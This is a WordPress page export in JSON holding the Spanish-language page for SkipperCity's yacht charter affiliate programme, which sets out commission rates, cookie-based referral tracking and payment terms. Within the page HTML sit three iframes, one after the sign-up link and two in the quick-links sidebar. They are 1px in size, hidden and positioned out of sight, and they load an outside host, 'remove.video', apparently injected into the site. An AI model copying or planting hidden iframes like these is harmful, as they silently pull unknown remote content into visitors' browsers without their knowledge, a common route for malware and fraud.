{"id":412088,"date":"2024-01-15T12:32:29","date_gmt":"2024-01-15T12:32:29","guid":{"rendered":"https:\/\/www.skippercity.com\/programa-de-afiliacion-de-alquiler-de-yates\/"},"modified":"2024-02-21T11:19:51","modified_gmt":"2024-02-21T11:19:51","slug":"programa-de-afiliacion-de-alquiler-de-yates","status":"publish","type":"page","link":"https:\/\/skippercity.com\/es\/programa-de-afiliacion-de-alquiler-de-yates\/","title":{"rendered":"Programa de Afiliaci\u00f3n de Alquiler de Yates"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"412088\" class=\"elementor elementor-412088 elementor-412040\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1250e588 elementor-section-full_width elementor-section-height-min-height elementor-section-items-stretch elementor-section-content-middle elementor-section-height-default\" data-id=\"1250e588\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9f1c76f\" data-id=\"9f1c76f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a4f0833 elementor-widget elementor-widget-heading\" data-id=\"4a4f0833\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Programa de Afiliaci\u00f3n de Alquiler de Yates<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4eaa1748 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4eaa1748\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-25087f4b\" data-id=\"25087f4b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-571c4982\" data-id=\"571c4982\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-66f25697\" data-id=\"66f25697\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4518a569 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4518a569\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-4a55adf6\" data-id=\"4a55adf6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-225b732b elementor-widget elementor-widget-text-editor\" data-id=\"225b732b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\"><strong>Datos breves:<\/strong><\/span><\/p>\n<ul>\n<li>El programa de afiliados que mejor paga<\/li>\n<li>20-25% de nuestra comisi\u00f3n por alquiler de embarcaciones<\/li>\n<li>Comisiones vitalicias<\/li>\n<li>365 d\u00edas de caducidad de las cookies<\/li>\n<\/ul>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-16c35e15 elementor-widget elementor-widget-table-of-contents\" data-id=\"16c35e15\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;exclude_headings_by_selector&quot;:[],&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;,&quot;h5&quot;,&quot;h6&quot;],&quot;marker_view&quot;:&quot;numbers&quot;,&quot;no_headings_message&quot;:&quot;No se ha encontrado ning\\u00fan encabezado en esta p\\u00e1gina.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__header\">\n\t\t\t\t\t\t<h4 class=\"elementor-toc__header-title\">\n\t\t\t\t\u00cdndice de contenidos\t\t\t<\/h4>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div id=\"elementor-toc__16c35e15\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<svg class=\"elementor-toc__spinner eicon-animation-spin e-font-icon-svg e-eicon-loading\" aria-hidden=\"true\" viewBox=\"0 0 1000 1000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M500 975V858C696 858 858 696 858 500S696 142 500 142 142 304 142 500H25C25 237 238 25 500 25S975 237 975 500 763 975 500 975Z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-70ed3a7f\" data-id=\"70ed3a7f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4c5b7b5f elementor-widget elementor-widget-text-editor\" data-id=\"4c5b7b5f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Programa de Afiliaci\u00f3n de Alquiler de Yates<\/h2>\n<p>Si tiene un sitio web con clientes que podr\u00edan estar interesados en alquilar yates -veleros, goletas, yates a motor, superyates- en cualquier parte del mundo, nos interesar\u00eda trabajar con usted en una asociaci\u00f3n de afiliaci\u00f3n.<\/p>\n<p><u><b>Nos encantan los socios.<\/b><\/u><\/p>\n<p>El Programa de Afiliaci\u00f3n de Yachtco le permite empezar a ganar dinero con el alquiler de yates simplemente a\u00f1adiendo un enlace desde su sitio al nuestro.<\/p>\n<h2>\u00bfC\u00f3mo funciona?<\/h2>\n<p>Cuando un cliente <strong>hace clic en su enlace en su sitio web<\/strong> (o blog o redes sociales), termina en nuestro sitio y, a continuaci\u00f3n, alquila un barco a trav\u00e9s de nosotros, se le abona un porcentaje de la comisi\u00f3n de acuerdo con nuestros t\u00e9rminos y condiciones. Todo est\u00e1 controlado (electr\u00f3nicamente y fuera de l\u00ednea) y supervisamos el estado de los clientes potenciales por usted.<\/p>\n<p><strong>Un corredor (es decir, nosotros) cobra una comisi\u00f3n<\/strong> sobre el valor neto del alquiler de una embarcaci\u00f3n reservada (sin incluir el APA ni ning\u00fan art\u00edculo o servicio adicional solicitado). Esta comisi\u00f3n depende de la ubicaci\u00f3n, el tipo de embarcaci\u00f3n y las comisiones del sector. <strong>El afiliado (es decir, t\u00fa) ganar\u00e1 un 20%-25%<\/strong> como tasa base por esta comisi\u00f3n obtenida del broker.<\/p>\n<p><b>Skippercity se enorgullece de hacer un seguimiento fiel de todos los clientes de ch\u00e1rter, y por ello los afiliados son compensados ganando entre un 20% y un 25% de nuestra comisi\u00f3n sobre todas las reservas de los clientes que vuelven a nosotros.<\/b><\/p>\n<p>Nuestro sistema realiza un seguimiento de los clientes que previamente han solicitado informaci\u00f3n a un afiliado o han reservado a trav\u00e9s de un afiliado, por lo que siempre podemos devolver las comisiones al afiliado. Skippercity respetar\u00e1 la introducci\u00f3n y ofrecer\u00e1 a los afiliados una comisi\u00f3n de introducci\u00f3n si el cliente vuelve a Skippercity fuera del programa de afiliaci\u00f3n (es decir, sin cookies) para respetar el enlace que nos ha dado, ya que anteriormente lleg\u00f3 a nosotros habi\u00e9ndose informado a trav\u00e9s de un afiliado.<\/p>\n<p>3.000 EUR es el valor neto medio del fletamento para empezar a percibir su comisi\u00f3n. Se aplican nuestras condiciones.<\/p>\n<p>Tenemos formas de consulta, im\u00e1genes elegantes y botones para usted. Todo esto est\u00e1 disponible desde tu \u00abpanel de control\u00bb de afiliado, as\u00ed que todo lo que tienes que hacer es copiar y pegar el c\u00f3digo en tu sitio web, \u00a1y listo!<\/p>\n<p>Tu URL para afiliados ser\u00e1 https:\/\/skippercity.com\/?ref=username. Basta con que instale el c\u00f3digo (?ref=?ref=nombredeusuario) al final de cualquier enlace a Skippercity, \u00a1y todo estar\u00e1 controlado a partir de ah\u00ed!<\/p>\n<p><a href=\"https:\/\/skippercity.com\/es\/conviertase-en-nuestro-afiliado\/\">Si est\u00e1s interesado en inscribirte en nuestro programa de afiliados, s\u00f3lo tienes que hacer clic aqu\u00ed para registrar<\/a> te y procesaremos tu solicitud para unirte al programa.<\/p>\n<p>Todo el contenido del sitio SkipperCity est\u00e1 protegido por derechos de autor. No animamos a nuestros afiliados a utilizar ning\u00fan contenido de https:\/\/skippercity.com y a copiar o duplicar el material en su propio sitio web como propio de alguna manera. Pero puede crear su propio contenido y enlazarnos.<\/p>\n<h2>Seguimiento de las ventas<\/h2>\n<p>Todos los clientes procedentes de su sitio web ser\u00e1n \u00abcocinados\u00bb y su cuenta estar\u00e1 vinculada mediante cookies. Cuando un cliente nos env\u00eda una consulta o crea una cuenta con nosotros, hacemos lo que mejor sabemos hacer: recomendar el barco adecuado, organizar el contrato y los pagos, y organizar que el cliente suba a bordo.<\/p>\n<p>Si el cliente que alquila un yate procede de su sitio web, compartiremos con usted una parte de la comisi\u00f3n.<\/p>\n<h2>\u00bfC\u00f3mo le pagan?<\/h2>\n<p>Pagamos a nuestros afiliados mediante transferencia bancaria o a trav\u00e9s de Stripe.<\/p>\n<p>Se pagar\u00e1 a los afiliados un mes despu\u00e9s de la finalizaci\u00f3n satisfactoria de la carta, que es la norma del sector para todas las partes interesadas. A todos los participantes se les paga al finalizar el ch\u00e1rter con \u00e9xito, porque si hay alg\u00fan problema durante el ch\u00e1rter, queremos asegurarnos de que los agentes, los gestores del yate, los patrones y los propietarios lo resuelven antes de que los clientes desembarquen del yate.<\/p>\n<p>Para todos los charters cancelados (por clientes o propietarios), los afiliados, agentes de viajes y todos los referidos no se les considera ninguna comisi\u00f3n.<\/p>\n<h2>C\u00f3mo inscribirse en el programa de afiliaci\u00f3n<\/h2>\n<p>Debe tener un sitio web, blog o red social existente con una base de clientes complementaria al alquiler de yates (viajes, productos de lujo, servicios de conserjer\u00eda, etc.) para solicitar el programa de afiliaci\u00f3n.<\/p>\n<p>Usted no tiene ning\u00fan riesgo ni gasto por el programa de afiliaci\u00f3n. S\u00f3lo tiene que rellenar <a href=\"https:\/\/skippercity.com\/es\/conviertase-en-nuestro-afiliado\/\">nuestro formulario en l\u00ednea.<\/a><iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74185aa8 elementor-align-justify elementor-widget elementor-widget-button\" data-id=\"74185aa8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/skippercity.com\/es\/conviertase-en-nuestro-afiliado\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Inscr\u00edbase en nuestro Programa de Afiliados de Alquiler de Yates<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-1b9e4a7d\" data-id=\"1b9e4a7d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c060e83 elementor-widget elementor-widget-text-editor\" data-id=\"7c060e83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\">Enlaces r\u00e1pidos:<\/span><\/p>\n<ul>\n<li><a href=\"https:\/\/skippercity.com\/es\/conviertase-en-nuestro-afiliado\/\">Registrarse<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/es\/acceso-de-afiliados\/\">Inicio de sesi\u00f3n<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/es\/mi-cuenta-2\/\">Su cuenta de afiliado<\/a><\/li>\n<\/ul>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Programa de Afiliaci\u00f3n de Alquiler de Yates Datos breves: El programa de afiliados que mejor paga 20-25% de nuestra comisi\u00f3n por alquiler de embarcaciones Comisiones vitalicias 365 d\u00edas de caducidad de las cookies \u00cdndice de contenidos Programa de Afiliaci\u00f3n de Alquiler de Yates Si tiene un sitio web con clientes que podr\u00edan estar interesados en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":408270,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-412088","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/skippercity.com\/es\/wp-json\/wp\/v2\/pages\/412088","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/skippercity.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/skippercity.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/skippercity.com\/es\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/skippercity.com\/es\/wp-json\/wp\/v2\/comments?post=412088"}],"version-history":[{"count":0,"href":"https:\/\/skippercity.com\/es\/wp-json\/wp\/v2\/pages\/412088\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/skippercity.com\/es\/wp-json\/wp\/v2\/media\/408270"}],"wp:attachment":[{"href":"https:\/\/skippercity.com\/es\/wp-json\/wp\/v2\/media?parent=412088"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}